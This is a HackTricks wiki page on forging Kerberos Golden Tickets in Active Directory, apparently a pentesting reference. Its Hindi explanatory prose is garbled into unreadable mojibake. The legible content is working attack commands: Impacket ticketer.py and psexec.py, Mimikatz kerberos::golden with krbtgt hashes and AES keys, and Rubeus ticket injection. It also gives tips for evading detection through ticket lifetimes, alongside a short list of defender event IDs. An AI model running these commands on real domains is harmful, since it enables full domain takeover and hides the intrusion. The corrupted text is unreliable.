Golden Ticket

Support HackTricks

Golden ticket

рдПрдХ Golden Ticket рд╣рдорд▓рд╛ рдХрд┐рд╕реА рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХрд╛ рдЕрдиреБрдХрд░рдг рдХрд░рддреЗ рд╣реБрдП рдПрдХ рд╡реИрдз рдЯрд┐рдХрдЯ рдЧреНрд░рд╛рдВрдЯрд┐рдВрдЧ рдЯрд┐рдХрдЯ (TGT) рдмрдирд╛рдиреЗ рдкрд░ рдЖрдзрд╛рд░рд┐рдд рд╣реИ, рдЬреЛ Active Directory (AD) krbtgt рдЦрд╛рддреЗ рдХреЗ NTLM рд╣реИрд╢ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред рдпрд╣ рддрдХрдиреАрдХ рд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рдлрд╛рдпрджреЗрдордВрдж рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдпрд╣ рдЕрдиреБрдХрд░рдг рдХрд┐рдП рдЧрдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рдбреЛрдореЗрди рдХреЗ рднреАрддрд░ рдХрд┐рд╕реА рднреА рд╕реЗрд╡рд╛ рдпрд╛ рдорд╢реАрди рддрдХ рдкрд╣реБрдВрдЪ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИред рдпрд╣ рдпрд╛рдж рд░рдЦрдирд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рд╣реИ рдХрд┐ krbtgt рдЦрд╛рддреЗ рдХреЗ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХрднреА рднреА рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдЕрдкрдбреЗрдЯ рдирд╣реАрдВ рд╣реЛрддреЗред

krbtgt рдЦрд╛рддреЗ рдХрд╛ NTLM рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╡рд┐рднрд┐рдиреНрди рд╡рд┐рдзрд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдЗрд╕реЗ рд╕реНрдерд╛рдиреАрдп рд╕реБрд░рдХреНрд╖рд╛ рдкреНрд░рд╛рдзрд┐рдХрд░рдг рдЙрдкрдкреНрд░рдгрд╛рд▓реА рд╕реЗрд╡рд╛ (LSASS) рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдпрд╛ NT рдбрд╛рдпрд░реЗрдХреНрдЯрд░реА рд╕реЗрд╡рд╛рдПрдВ (NTDS.dit) рдлрд╝рд╛рдЗрд▓ рд╕реЗ рдирд┐рдХрд╛рд▓рд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рдЬреЛ рдбреЛрдореЗрди рдХреЗ рднреАрддрд░ рдХрд┐рд╕реА рднреА рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░ (DC) рдкрд░ рд╕реНрдерд┐рдд рд╣реИред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, DCsync рд╣рдорд▓реЗ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдирд╛ рдЗрд╕ NTLM рд╣реИрд╢ рдХреЛ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреА рдПрдХ рдФрд░ рд░рдгрдиреАрддрд┐ рд╣реИ, рдЬрд┐рд╕реЗ Mimikatz рдореЗрдВ lsadump::dcsync рдореЙрдбреНрдпреВрд▓ рдпрд╛ Impacket рджреНрд╡рд╛рд░рд╛ secretsdump.py рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдпрд╣ рдорд╣рддреНрд╡рдкреВрд░реНрдг рд╣реИ рдХрд┐ рдЗрди рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдпрд╛ рд╕рдорд╛рди рд╕реНрддрд░ рдХреА рдкрд╣реБрдВрдЪ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИред

рд╣рд╛рд▓рд╛рдВрдХрд┐ NTLM рд╣реИрд╢ рдЗрд╕ рдЙрджреНрджреЗрд╢реНрдп рдХреЗ рд▓рд┐рдП рдПрдХ рд╡реНрдпрд╡рд╣рд╛рд░реНрдп рд╡рд┐рдзрд┐ рдХреЗ рд░реВрдк рдореЗрдВ рдХрд╛рд░реНрдп рдХрд░рддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рд╕рдВрдЪрд╛рд▓рди рд╕реБрд░рдХреНрд╖рд╛ рдХрд╛рд░рдгреЛрдВ рд╕реЗ рдЙрдиреНрдирдд рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдорд╛рдирдХ (AES) Kerberos рдХреБрдВрдЬреА (AES128 рдФрд░ AES256) рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЯрд┐рдХрдЯреЛрдВ рдХреЛ рдмрдирд╛рдирд╛ рдХрд╛рдлреА рдЕрдиреБрд╢рдВрд╕рд┐рдд рд╣реИред

From Linux
python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass
Windows рд╕реЗ
#mimikatz
kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist #List tickets in memory

# Example using aes key
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi

рдПрдХ рдмрд╛рд░ рдЬрдм рдЖрдк рдЧреЛрд▓реНрдбрди рдЯрд┐рдХрдЯ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░ рд▓реЗрддреЗ рд╣реИрдВ, рддреЛ рдЖрдк рд╕рд╛рдЭрд╛ рдлрд╝рд╛рдЗрд▓реЛрдВ (C$) рддрдХ рдкрд╣реБрдБрдЪ рд╕рдХрддреЗ рд╣реИрдВ, рдФрд░ рд╕реЗрд╡рд╛рдУрдВ рдФрд░ WMI рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рдЖрдк psexec рдпрд╛ wmiexec рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ (рдРрд╕рд╛ рд▓рдЧрддрд╛ рд╣реИ рдХрд┐ рдЖрдк winrm рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдирд╣реАрдВ рдХрд░ рд╕рдХрддреЗ)ред

рд╕рд╛рдорд╛рдиреНрдп рдкрд╣рдЪрд╛рди рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдирд╛

рдЧреЛрд▓реНрдбрди рдЯрд┐рдХрдЯ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдХреЗ рд╕рдмрд╕реЗ рд╕рд╛рдорд╛рдиреНрдп рддрд░реАрдХреЗ рдХреЗрд░реНрдмреЗрд░реЛрд╕ рдЯреНрд░реИрдлрд╝рд┐рдХ рдХреА рдЬрд╛рдВрдЪ рдХрд░рдирд╛ рд╣реИред рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ, Mimikatz TGT рдХреЛ 10 рд╡рд░реНрд╖реЛрдВ рдХреЗ рд▓рд┐рдП рд╕рд╛рдЗрди рдХрд░рддрд╛ рд╣реИ, рдЬреЛ рдЗрд╕рдХреЗ рд╕рд╛рде рдХрд┐рдП рдЧрдП рдмрд╛рдж рдХреЗ TGS рдЕрдиреБрд░реЛрдзреЛрдВ рдореЗрдВ рдЕрд╕рд╛рдорд╛рдиреНрдп рдХреЗ рд░реВрдк рдореЗрдВ рдЦрдбрд╝рд╛ рд╣реЛрдЧрд╛ред

Lifetime : 3/11/2021 12:39:57 PM ; 3/9/2031 12:39:57 PM ; 3/9/2031 12:39:57 PM

рд╢реБрд░реБрдЖрдд рдСрдлрд╝рд╕реЗрдЯ, рдЕрд╡рдзрд┐ рдФрд░ рдЕрдзрд┐рдХрддрдо рдирд╡реАрдиреАрдХрд░рдг (рд╕рднреА рдорд┐рдирдЯреЛрдВ рдореЗрдВ) рдХреЛ рдирд┐рдпрдВрддреНрд░рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП /startoffset, /endin рдФрд░ /renewmax рдкреИрд░рд╛рдореАрдЯрд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВред

Get-DomainPolicy | select -expand KerberosPolicy

рджреБрд░реНрднрд╛рдЧреНрдпрд╡рд╢, TGT рдХрд╛ рдЬреАрд╡рдирдХрд╛рд▓ 4769 рдореЗрдВ рд▓реЙрдЧ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдЗрд╕рд▓рд┐рдП рдЖрдк рдпрд╣ рдЬрд╛рдирдХрд╛рд░реА Windows рдЗрд╡реЗрдВрдЯ рд▓реЙрдЧ рдореЗрдВ рдирд╣реАрдВ рдкрд╛рдПрдВрдЧреЗред рд╣рд╛рд▓рд╛рдБрдХрд┐, рдЖрдк рдЬреЛ рд╕рд╣рд╕рдВрдмрдВрдзрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рд╡рд╣ рд╣реИ 4769 рдХреЛ рдмрд┐рдирд╛ рдкреВрд░реНрд╡ 4768 рдХреЗ рджреЗрдЦрдирд╛ред рдпрд╣ TGT рдХреЗ рдмрд┐рдирд╛ TGS рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рдирд╛ рд╕рдВрднрд╡ рдирд╣реАрдВ рд╣реИ, рдФрд░ рдпрджрд┐ TGT рдЬрд╛рд░реА рд╣реЛрдиреЗ рдХрд╛ рдХреЛрдИ рд░рд┐рдХреЙрд░реНрдб рдирд╣реАрдВ рд╣реИ, рддреЛ рд╣рдо рдпрд╣ рдирд┐рд╖реНрдХрд░реНрд╖ рдирд┐рдХрд╛рд▓ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдЗрд╕реЗ рдСрдлрд╝рд▓рд╛рдЗрди рддреИрдпрд╛рд░ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред

рдЗрд╕ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рд╕реЗ рдмрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рд╣реАрд░реЗ рдХреЗ рдЯрд┐рдХрдЯреЛрдВ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ:

Diamond Ticket

рд╢рдорди

  • 4624: рдЦрд╛рддрд╛ рд▓реЙрдЧрд┐рди

  • 4672: рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рд▓реЙрдЧрд┐рди

  • Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List тАУProperty

рдЕрдиреНрдп рдЫреЛрдЯреЗ рдЯреНрд░рд┐рдХреНрд╕ рдЬреЛ рд░рдХреНрд╖рдХ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рд╡рд╣ рд╣реИ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП 4769 рдкрд░ рдЕрд▓рд░реНрдЯ рдХрд░рдирд╛ рдЬреИрд╕реЗ рдХрд┐ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХ рдЦрд╛рддрд╛ред

рд╕рдВрджрд░реНрдн

Support HackTricks

Last updated